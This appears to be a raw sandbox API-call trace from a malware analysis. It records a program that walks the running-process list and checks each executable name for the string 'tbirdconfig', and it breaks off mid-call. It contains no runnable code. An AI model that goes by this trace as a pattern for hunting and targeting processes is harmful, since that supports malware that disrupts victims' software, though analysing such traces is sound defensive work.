Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.232] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572858 [0095.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572858, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.232] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.232] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.233] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572960 [0095.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572960, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.233] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.233] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0095.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.235] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572870 [0095.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3572870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0095.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0095.235] StrStrIA (lpFirst="spoolsv.exe", lpSrch="tbirdconfig") returned 0x0 [0095.235] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.236] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572a68 [0095.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572a68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.236] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.236] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.237] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35728a0 [0095.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35728a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0095.237] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0095.238] StrStrIA (lpFirst="audiodg.exe", lpSrch="tbirdconfig") returned 0x0 [0095.238] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0095.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.239] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572978 [0095.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3572978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0095.239] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0095.239] StrStrIA (lpFirst="sihost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.239] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.240] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572990 [0095.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3572990, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.240] StrStrIA (lpFirst="svchost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.240] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.242] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572c60 [0095.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3572c60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.242] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.242] StrStrIA (lpFirst="taskhostw.exe", lpSrch="tbirdconfig") returned 0x0 [0095.242] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0095.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.243] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572c90 [0095.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3572c90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0095.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0095.243] StrStrIA (lpFirst="explorer.exe", lpSrch="tbirdconfig") returned 0x0 [0095.243] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0095.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.245] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35744e8 [0095.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35744e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0095.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0095.245] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="tbirdconfig") returned 0x0 [0095.245] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0095.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.246] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a948 [0095.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356a948, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0095.246] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0095.246] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="tbirdconfig") returned 0x0 [0095.246] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0095.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.247] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574528 [0095.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3574528, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0095.248] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0095.248] StrStrIA (lpFirst="Memory Compression", lpSrch="tbirdconfig") returned 0x0 [0095.248] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0095.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0095.249] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3574748 [0095.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3574748, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0095.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0095.249] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="tbirdconfig") returned 0x0 [0095.249] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0095.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.250] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572be8 [0095.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3572be8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0095.250] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0095.250] StrStrIA (lpFirst="SearchUI.exe", lpSrch="tbirdconfig") returned 0x0 [0095.250] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0095.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.252] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3574588 [0095.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3574588, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0095.252] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0095.252] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="tbirdconfig") returned 0x0 [0095.252] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.258] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572c00 [0095.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3572c00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.259] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.259] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="tbirdconfig") returned 0x0 [0095.259] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0095.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.260] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572ae0 [0095.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3572ae0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0095.260] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0095.260] StrStrIA (lpFirst="pending.exe", lpSrch="tbirdconfig") returned 0x0 [0095.260] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0095.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.261] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a970 [0095.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356a970, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0095.261] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0095.261] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="tbirdconfig") returned 0x0 [0095.261] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0095.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.263] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35745a8 [0095.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x35745a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0095.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0095.263] StrStrIA (lpFirst="swing prefer.exe", lpSrch="tbirdconfig") returned 0x0 [0095.263] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0095.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.264] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356ac90 [0095.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356ac90, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0095.264] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0095.264] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="tbirdconfig") returned 0x0 [0095.264] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0095.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.266] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35746a8 [0095.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x35746a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0095.266] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0095.266] StrStrIA (lpFirst="nights-attending.exe", lpSrch="tbirdconfig") returned 0x0 [0095.267] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0095.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.268] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572d20 [0095.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3572d20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0095.269] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0095.269] StrStrIA (lpFirst="installed.exe", lpSrch="tbirdconfig") returned 0x0 [0095.269] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0095.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0095.270] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356ada8 [0095.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", 